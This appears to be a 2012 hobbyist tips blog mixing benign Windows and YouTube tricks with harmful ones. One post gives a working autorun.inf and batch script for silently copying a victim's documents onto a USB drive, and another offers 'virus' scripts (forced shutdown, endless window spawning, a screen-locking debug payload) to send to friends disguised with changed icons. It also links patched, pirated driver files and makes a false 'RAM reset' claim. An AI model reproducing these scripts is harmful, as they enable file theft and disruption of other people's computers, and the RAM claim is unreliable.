Friday, May 18, 2012

2 very useful YouTube hacks

Do you utilize YouTube to host videos you create and want to share with the world at the best quality? Has someone else created a YouTube video, but you are only interested in a portion of it for your blog or website? Here are 2 tips that help ensure your audience has a better YouTube expereince:
Tip 1. Forcing the browser to use the High Quality version of the video
You may notice just under the lower right coner of the video window, some videos have an option to “Watch In High Quality”. By default, these videos will play as a 320×240 FLV file at 320Kb/s. Check out this sample:
The user could click on this link to “Watch in High Quality” which will reload the video and play the MP4 version , which is 480×360 at 512Kb/s. By adding &fmt=18 to the end of the URL, you’ll make the URL you share with others bring them right to the high quality version. Here’s the same video in the High Quality view:
What else are you gaining besides increased video resolution? The video is compressed with H.264 compression, so you get better video even at the same data rate. You also go from a low fidelity mono audio feed to stereo @ 44.1Khz sample rate.
&fmt=6 increases the resolution from 320×240 to 448×336, Flash 7 video @ 900Kbps; audio @ 44.1KHz 96Kbps Mono CBR.
&fmt=18 increases the resolution to 480×360, H.264 video @ 512Kbps; audio @ 44.1KHz 128Kbps Stereo. Note, the bandwidth may be lower, but it’s utilizing a more efficient compression codec.
UPDATE: &fmt=22 increaes the resolution to 720p HD video if the source was uploaded at a high enough resolution.
Tip 2. Advancing the video to a specific playback point.
If you evern wanted to link to a video in YouTube that was lengthy, but had a very interesting part partway through, there is a hack to allow you to begin playback at a precise time. You can specify the minutes and seconds of the start time like this:
add #t=53s to the end of the URL to start at 53 seconds into it:
add #t=1m57s to the end of the video URL to start playback at 1 minute 57 seconds:
Think of this as bookmarking your video clips! Now you can link to a video, and have an index of the segments included, which link right to that precise moment!

How to create a folder lock without any software

Hi there,
Here are some easy step to create a folderlock with out any software

follow the instructions its a helpful trick

1.copy the code given bellow

2.open a notepad and paste it then 'Save' it as batch file (with extension '.bat').
for example :lock file.bat

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End

3.Then you see a batch file. Double click on this batch file then i will automatic to create a folder name locker.

4.New folder named 'Locker' would be formed at the same location.

5.Now open the folder then you can store all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder name'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.
Enjoy ^^

Free online on your phone via bluetooth

This phone works on nearly all Sony Ericsson Phone, I am not sure regarding others.

You need :

A. Widcomm v5.0.1.2500 drivers
http://rapidshare.com/files/151128972/Widcomm.v5.0.1.2500.Incl.Patch.rar

B. DHCP server
http://rapidshare.com/files/151128815/dhcpsrv1.5.rar

-----------------------------------------------------------------------------
On Windows Vista
After you install Widcomm bluetooth driver with right click run as administrator copy BTNeighborhood.dll & wbtapi.dll from WIN/system32 and patch them elsewhere, after that reboot and enter in safe mod with comand prompt and in the cmd write: del BTNeighborhood.dll & del wbtapi.dll after that open task manager and run explorer.exe then copy your patched BTNeighborhood.dll & wbtapi.dll in WIN/system32, reboot in normal mode and follow all the steps.

Note:
Run Widcomm_patcher_v2.exe with right click run as administrator to patch widcomm.
-----------------------------------------------------------------------------
On Windows XP
After installing Widcomm drivers, run Widcomm_patcher_v2.exe in safe mode and patch the files it requests. Continue the tutorial back in normal mode.
-----------------------------------------------------------------------------

First you need to install Widcomm bluetooth driver and follow the instructions in the Install.txt, then go Advanced Configuration/Local Services/Network Access and select: "Allow other devices to access the Internet/LAN via this computer." After that go to Control panel /Network connections click properties on your default internet connection go to advanced tab and check "Allow other network users to connect through this computer's Internet connection." .And then your Bluetooth Network ip address will be 192.168.0.1.


Second you need to configure the DHCP server with:


1. Bluetooth Network adapter IP address after ICS (Internet Conection Sharing) with your default internet conection. (leave it like in the picture)
2. Ip address of the bluetooth network adapter address after ICS (same as 1.) (leave it like in the picture)
3. You Phone MAC address Image (capital letters)
4. Ip address for your phone (same class as the bluetooth network adapter) (if you don't use that ip in the picture you can leave it like that)
5. Network adapter for the DHCP server to listen (ip address of the bluetooth network adapter address after ICS) (same as 1.) (leave it like in the picture)

Third you need to make a new internet profile on your phone that connects to the bluetooth data account. (Settings/Connectivity/Internet settings/Internet profiles/New profile/Name (any name)/Connect using/your PC bluetooth name. Select this profile as default for Internet profiles and Settings for java .)

Last you need to connect to your computer via phone and ONLY phone from Settings/Connectivity/Bluetooth/My Devices/New device, search for your PC, pair and then click Connect (after you see Connected on your phone and PC your connected to the internet via bluetooth and your bluetooth will not disconnect after you enter and exit a application that needs a internet connection eg: Opera Mini) and every time you want to connect to the internet from your phone if your bluetooth disconnects you have to search and pair you PC from your phone and click Connect.

For this to work you have to use ICS (Internet Conection Sharing)not Bridge Connection !

Works with any phone that can connect to Bluetooth PAN (Personal Area Network), eg: SE W660/K800/K810/W850/W880/etc.

Your done have fun ! :)

PS. REMEMBER TO ADD THE DHCP SERVER ONTO YOUR FIREWALL LIST (this includes Windows Firewall)

VIDEO GUIDE - YOUTUBE
http://www.megavideo.com/?v=QCWY809I
http://uk.youtube.com/watch?v=KgRlc4jt2H0

*Sometimes when i cannot connect, i restart the DCHP server and i also i go on my network connections and i turn off and turn on internet sharing. that normally fixes the problem.

MOBILE PHONES CONFIRMED TO BE WORKING:

Sony Ericsson:
k750i
k800i
k810
k850

HTC:
HTC Touch
HTC Touch Dual 1 & 2

Control your mouse with keyboard

Mouse not work??move your mouse pointer with you keyboard
You can control your mouse pointer with keyboard keys in all windows versions. When your mouse stops working, you can enable this keyboard feature to complete your important work. This keyboard mouse can performs all tasks same like a normal mouse.

Follow the given steps to activate the keyboard mouse:

1. To edit this feature, first you should log onto your computer with administrative rights.
2. To activate this feature, press Alt+Shift+NumLock keys at once and you will receive a small MouseKey box.
3. To keep MouseKeys on, click on Ok button or click on cancel button to cancel MouseKeys box.
4. Click on Settings button, if you want to adjust the mouse cursor detail settings.
5. Here a new dialog box will appear with the title Settings for MouseKeys, now you can manage all mouse settings for example mouse cursor speed, acceleration and some other features.

Now using Numeric keypad, you can move your mouse pointer.

The controls are:

* 1,2,3,4,6,7,8 and 9 keys are used to move the mouse cursor into different directions.
* Key 5 is used as mouse click button.
* Insert key used to hold down mouse button.
* + Sign used to double click on any object.
* Delete button used to release the mouse.
* Click on NumLock button to disable this keyboard mouse feature

How to Steal people files using usb drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit

:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

How to chat with other computer using comand prompt

If you want personal chat with a friend
you don’t need to download any yahoo messenger
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


Now save this as “Messenger.bat”. Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After “User” type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press “Enter” it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi
Now all you need to do is press “Enter”, and start chatting!

Five tips How to restoring an unbootable hard drive

Have you ever tried to restart a machine only to find it won’t boot? For whatever reason, you get a warning message informing you that disaster might well have struck… and you’re staring in the face of what could be a very bad day. Well, don’t panic yet. There are a few tricks you can try that may get that machine booted. All is not lost until you know, with 100 percent certainty, that the drive will not boot — and even then, you can possibly recover your data. Here are some tips that can help you to get that drive booted and your machine recovered.

1: Boot from a restore disk



With many operating systems, restore disks can be created and used to deal with such disasters. The problem with this usually arises because the user hasn’t made a restore disk. I always tell users that one of the first things they should do when they get a new computer or install a fresh operating system is create a restore disk and then put it somewhere safe. That disk can really save your hide — especially in cases such as an unbootable drive. Now, every operating system approaches the restore disk differently. For example, some Linux distributions, such as Ubuntu 11.04, let you use the Live disk as a restore disk. So even if you didn’t create a restore disk, you can just download the same release that’s installed on the machine and use that as your restore.


2: Use the install disk

If you didn’t create a recovery disk in Windows, but you have the full installation disk, you’ll be okay. Those disks include recovery tools that can be accessed by pressing R at the Welcome To Setup screen. The tools let you fix boot problems, restore the hard drive from image, diagnose memory, and perform system restore. Note: The system restore typically can work only if the system restore partition is intact.

3: Get to know BartPE

There are tools… and then there is BartPE. BartPE is a huge challenge to build. But once you have it, you have a serious tool for fixing serious problems. Bart E creates a complete, preinstalled Win32 environment on your hard drive that allows you to use many of the tools available for repair. You to run check disk on your drive, which could easily solve your problem.

4: Rebuild the MBR

In many instances, the problem is a corrupt master boot record (MBR). If that’s the case, the MBR needs to be rebuilt. This process will vary, depending upon the operating system you use. With Windows 7, the necessary tool is Bootrec.exe, which can be found in the Windows Recovery Environment. If the operating system uses Grub 2 and the boot loader was lost after a Windows installation (with the intent to dual-boot), there is a tool called Grub4dos, which can certainly be a lifesaver. If no Windows environment is on the machine, grab that Live CD and you’ll have all the tools you need to rebuild your Grub boot loader. The specific tool you want is grub-install, and to rebuild the grub menu, update-grub.

5: Remove the drive

If all else fails, pull out the drive from the machine, attach it to a machine known to run, and see if the drive can be seen at all. It is possible that the reason the drive will not boot is due to physical damage. If the drive can be seen but not accessed, most likely the partition table has gone corrupt. But if the drive can’t even be seen, especially using a Linux machine to view it, the drive might well be physically damaged. If the drive can be seen and accessed, the problem is probably the MBR. I would highly recommend that at this point, you copy your data over to another drive — just in case.

What has saved you?

There are plenty of ways to recover that unbootable drive, but the techniques above have always brought me the most luck. What about you? If you’ve found a more reliable or efficient way to recover a drive that refuses to boot, share it with your fellow .

[Security Tips]How to Against Hackers Attack

Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage.

In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.

Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.

1.Clearing the Page File at Shutdown

Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSe ssion ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2.Disable the POSIX and OS/2 Subsystem.


Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. then reboot.


3.Never leave default passwords blank.
On installation, Windows 2000 sets up an Administrator account with total system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.


4.Disable the Guest account

Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.


5. Install Windows In a different directory.

Windows usually installs itself in the WINDOWS directory. Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but t hey are very few and they are far between

6. Fake out hackers with a dummy Administrator account

Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.
Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such software. The original Administrator account is configured with a security ID that must continue to be present in the system.

7. Set the Hosts file to read-only to prevent name hijacking.

This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.

8. Turn off unneeded Services

Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.

9. Disallow changes to IE settings through IE

This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

10. Disable simple FileShares

In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)

How to Reset Your Ram

Ok Mates, Sharing Something With You All Which I Have Been Using For Quite A While... This Definitely Works As I Have Used It Myself! All You Have To Do Is Simply Create The File & Hit Enter On It As Much Of Times You Can, Every Time You Do It It Keeps Reseting Your Ram & Eventually Speeding Your PC Up!
Tested On - Windows XP, Vista, 7.
If You Are Suspicious Of The Code Inside This File, You Can Simply Build It Yourself Too By Following These Steps -
1. Open NotePad.
2. Type In mystring=800000000 & Save The File As Anything.vbe
3. You Are Done, You Can Change Anything To Whatever Name You Wish To But Please Keep in Mind the .vbe extension Should Be There At The Last Of The Name.
4. Hit Enter On The File You Have Created As Many Times You Can!
Enjoy!

10 virus notepad script


All this comand use to type in notepad

1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.
 

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

Thursday, May 17, 2012

How to Hide or Show Your Hard drive Partitions

To Hide or Show Your Hard drive Partitions

You have Follow certain steps :

STEP 1: if u r looking for "how to Hide or Show Your Hard drive Partitions" ,then it'll guide u how to do this.....first open CMD in ur PC , then type disk part


STEP 2: then u will see this next window in ur PC ,now all tasks will be done in this command prompt window


STEP 3 :then u will see this next window in ur PC ,then Type list volume and enter, Now Command Prompt Lists your partitions.


STEP 4 :I'm showing off the being hidden of partition volume 0 named local disk (H:) and labeled H.so i commanded select volume 0


STEP 5 :Now Command as remove letter H.now see in My Computer menu..disk partition has hidden


STEP 6 :Now its time To show off the drive, follow up-to Step 3 & fourth step command will be assign letter H & see that you've assigned the drive letter "H" successfully.


STEP 7visit in ur My Computer menu.....now u can see previously hidden disk partition